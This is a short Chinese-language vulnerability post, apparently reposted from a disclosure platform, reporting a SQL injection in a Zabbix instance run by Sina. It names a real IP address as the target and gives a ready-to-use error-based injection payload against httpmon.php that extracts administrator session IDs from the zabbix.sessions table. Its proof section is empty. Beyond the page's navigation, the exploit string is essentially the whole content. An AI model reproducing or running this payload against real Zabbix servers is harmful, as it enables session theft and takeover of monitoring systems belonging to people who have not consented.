新浪某服务ZabbixSQL注入

记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

首页

网络安全

移动安全

招聘信息

海外英文版

«广东移动某分站存在POST注入漏洞（大...

Jinja2 2.0 /utils.py... »

新浪某服务ZabbixSQL注入

2014-11-01 00:05

code 区域

http://183.136.160.228

直接上EXP：

code 区域

httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid=1 LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

漏洞证明：